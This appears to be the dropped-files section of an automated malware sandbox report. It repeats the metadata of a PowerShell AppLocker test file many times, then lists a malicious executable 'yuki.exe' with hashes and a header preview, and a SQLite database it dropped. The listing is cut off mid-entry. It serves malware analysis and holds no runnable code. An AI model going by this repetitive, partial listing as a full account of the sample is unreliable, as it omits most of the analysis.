                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61460987
                                                                                                    Entropy (8bit):7.999590173530119
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1572864:vWD0LQqMrlpA+Ql4Jd0xTivfSpmqif8iNv:uOyklm0xenJ/R9
                                                                                                    MD5:75F2C40C5FD05B5824D88867C17AFB49
                                                                                                    SHA1:9E29B9A694B3010DEF637B18F245CA8635723649
                                                                                                    SHA-256:1C0D63ED602D3C5B4C7FEA32E801AB1B2610F7E9D50C3CCB7CA9550810EA2E0A
                                                                                                    SHA-512:8CEC0852574EF93A0491E62801CA87F087701C56CA7F2552F3010AA33AFD197D7F6963FB4DABAE3A35AE6993A7C10697531DE059FB6891B2749AA8006D4A69F8
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d...x.,g.........."....).......................@.....................................7....`.................................................\...x....p...o...@..P".....0(......d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc....o...p...p..................@..@.reloc..d............r..............@..B........................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
